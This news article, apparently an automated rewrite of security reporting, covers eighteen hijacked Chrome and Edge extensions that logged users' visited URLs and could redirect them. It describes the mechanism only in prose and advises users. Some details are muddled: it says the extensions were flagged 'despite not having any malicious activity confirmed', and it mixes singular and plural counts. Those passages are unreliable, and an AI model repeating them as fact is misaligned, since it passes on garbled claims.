Ethical Hacking News
Malicious Chrome extensions with 1.7 million installs have been found on Google's Chrome Web Store, putting users at risk of having their browsing activity tracked and potentially taken to unsafe destinations. Users are advised to remove the extensions immediately and take precautions to protect themselves from potential cyber threats.
Malicious Chrome extension downloaded over 1.7 million times, tracking users' browsing activity. Malicious extensions had hundreds of positive reviews and were featured prominently in the Chrome Web Store. Risk of being redirected to unsafe destinations, enabling cyberattacks. Auto-update system silently deploys new versions without user approval or interaction. Similar malicious extension found in Microsoft Edge store, infecting over 600,000 users. 18 extensions infected over 2.3 million users across both browsers. Users advised to remove listed extensions, clear browsing data, and monitor for suspicious activity.
Google's Chrome Web Store has recently been rocked by a malicious extension that has been downloaded over 1.7 million times, putting users at risk of having their browsing activity tracked and potentially taken to unsafe destinations. The extensions in question are verified, have hundreds of positive reviews, and are featured prominently on the Chrome Web Store, misleading users about their safety.
Researchers at Koi Security, a company providing a platform for security self-provisioned software, discovered these malicious extensions in the Chrome Web Store and reported them to Google. They found that many of these extensions were still available after being flagged by the company, despite not having any malicious activity confirmed.
The malicious functionality is implemented in the background service worker of each extension using the Chrome Extensions API, registering a listener that is triggered every time a user navigates to a new webpage. This listener captures the URL of the visited page and exfiltrates the information to a remote server along with a unique tracking ID for each user.
The server can respond with redirection URLs, hijacking the user’s browsing activity and potentially taking them to unsafe destinations that may enable cyberattacks. Although the possibility is there, Koi Security has not observed malicious redirections in their testing.
Furthermore, the malicious code was not present in the initial versions of the extensions, but was introduced at a later time via updates. Google's auto-update system silently deploys the newest versions to users without requiring any user approval or interaction.
Given that some of these extensions were safe for years, it is possible that they were hijacked/compromised by external actors who introduced the malicious code. Researchers discovered that cybercriminals have also planted malicious extensions in the official store for Microsoft Edge, which shows a total count of 600,000 downloads.
Combined, these eighteen extensions have infected over 2.3 million users across both browsers, creating one of the largest browser hijacking operations we’ve documented, according to Koi Security. They recommend users remove all listed extensions immediately, clear the browsing data to purge any tracking identifiers, check the system for malware, and monitor accounts for suspicious activity.
This incident highlights the importance of vigilance when it comes to browser extensions and the need for users to regularly inspect their installed add-ons for any signs of malicious activity. It also underscores the need for security software companies to implement robust detection mechanisms for such threats.
In conclusion, this discovery serves as a reminder that even seemingly legitimate browser extensions can be used for nefarious purposes. Users must remain cautious and vigilant when using these tools and always verify their safety before installing them on their systems.
Related Information:
https://www.ethicalhackingnews.com/articles/Malicious-Chrome-Extensions-with-17-Million-Installs-A-Growing-Threat-to-User-Security-ehn.shtml
https://www.bleepingcomputer.com/news/security/malicious-chrome-extensions-with-17m-installs-found-on-web-store/
Published: Tue Jul 8 09:44:48 2025 by llama3.2 3B Q4_K_M
